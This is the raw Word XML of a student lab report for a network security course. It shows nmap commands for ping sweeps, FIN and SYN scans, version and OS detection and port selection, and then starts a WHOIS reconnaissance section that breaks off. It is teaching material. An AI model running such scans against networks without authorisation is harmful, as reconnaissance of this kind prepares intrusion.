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u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CNS CA</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Extra Experiment 1</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Shashwat Tripathi</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">D15A              64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Batch C</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ind w:right="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exp 1: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Download, install nmap and use it with different options to scan open ports, perform OS fingerprinting, ping scan, tcp port scan,udp port scan, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:ind w:right="360"/>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1) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Installation of nmap:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$sudo apt-get install nmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:ind w:left="-1080" w:firstLine="0"/>
        <w:jc w:val="right"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="20066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1080" w:firstLine="0"/>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2) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$nmap -sP 10.0.0.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ping scans the network, listing machines that respond to ping.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:ind w:right="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5886450" cy="771525"/>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8864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right="360"/>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3) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FIN scan (-sF). Sets just the TCP FIN bit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$sudo nmap -sF </w:t>
      </w:r>
      <w:hyperlink r:id="rId8">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011">
      <w:pPr>
        <w:ind w:right="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="15748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right="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:ind w:right="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
      <w:pPr>
        <w:ind w:right="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
      <w:pPr>
        <w:ind w:right="360"/>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4)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Scan IP addresses and ports of a website or server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$sudo nmap -sS </w:t>
      </w:r>
      <w:hyperlink r:id="rId10">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018">
      <w:pPr>
        <w:ind w:right="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5214938" cy="1813528"/>
            <wp:effectExtent b="0" l="0" r="0" t="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214938" cy="181352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5) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-sV (Version detection):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enables version detection, as discussed above. Alternatively, can use -A, which enables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">version detection among other things.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$sudo nmap -A -sV </w:t>
      </w:r>
      <w:hyperlink r:id="rId12">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01D">
      <w:pPr>
        <w:ind w:left="-720" w:firstLine="0"/>
        <w:jc w:val="right"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="18034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6) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-sO (IP protocol scan) .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IP protocol scan allows you to determine which IP protocols (TCP, ICMP, IGMP, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">are supported by target machines. This isn't ́t technically a port scan, since it cycles</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">through</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IP protocol numbers rather than TCP or UDP port numbers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$sudo nmap -sO 192.168.16.128</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:ind w:right="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4447376" cy="179705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47376"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7) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-O (Enable OS detection) .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enables OS detection, as discussed above. Alternatively, you can use -A to enable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OS detection along with other things.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$sudo nmap -A 192.168.16.128</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">
      <w:pPr>
        <w:ind w:left="-720" w:firstLine="0"/>
        <w:jc w:val="right"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1320800"/>
            <wp:effectExtent b="0" l="0" r="0" t="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8) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p port ranges (Only scan specific ports) .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This option specifies which ports you want to scan and overrides the default. Individual</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port numbers are OK, as are ranges separated by a hyphen (e.g. 1-1023). The beginning</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and/or end values of a range may be omitted, causing Nmap to use 1 and 65535,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">respectively.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$sudo nmap -p 413 192.168.16.128</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
      <w:pPr>
        <w:ind w:right="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="17145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9)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> --top-ports &lt;integer of 1 or greater&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scans the N highest-ratio ports found in nmap-services file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$sudo nmap --top-ports 10 192.168.16.128</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
      <w:pPr>
        <w:ind w:right="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4446356" cy="2234406"/>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46356" cy="223440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10) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap –iflist</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Host interface and route information with nmap by using –iflist option.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$nmap -iflist</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">
      <w:pPr>
        <w:ind w:right="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5393101" cy="2869406"/>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3101" cy="286940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right="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">
      <w:pPr>
        <w:ind w:right="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">
      <w:pPr>
        <w:ind w:right="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pPr>
        <w:ind w:right="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">
      <w:pPr>
        <w:ind w:right="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
      <w:pPr>
        <w:ind w:right="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">
      <w:pPr>
        <w:ind w:right="360"/>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b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Extra Experiment 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="384.22119140625" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Aim:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="3c4043"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Study the use of network reconnaissance tools like WHOIS, dig, traceroute, nslookup to gather information about networks and domain registrars.</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Theory:</w:t>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t xml:space="preserve">1.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WHOIS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="239.51999999999998" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000009"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000009"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">whois searches for an object in a WHOIS database. WHOIS is a query</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="239.51999999999998" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000009"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000009"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and response protocol that is widely used for querying databases that store the</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="239.51999999999998" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000009"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000009"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">registered users of an Internet resource, such as a domain name or an IP address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="239.51999999999998" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000009"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000009"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">block, but is also used for a wider range of other information. Most modern</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="239.51999999999998" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000009"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000009"/>
          <w:rtl w:val="0"/>
        </w:rPr>
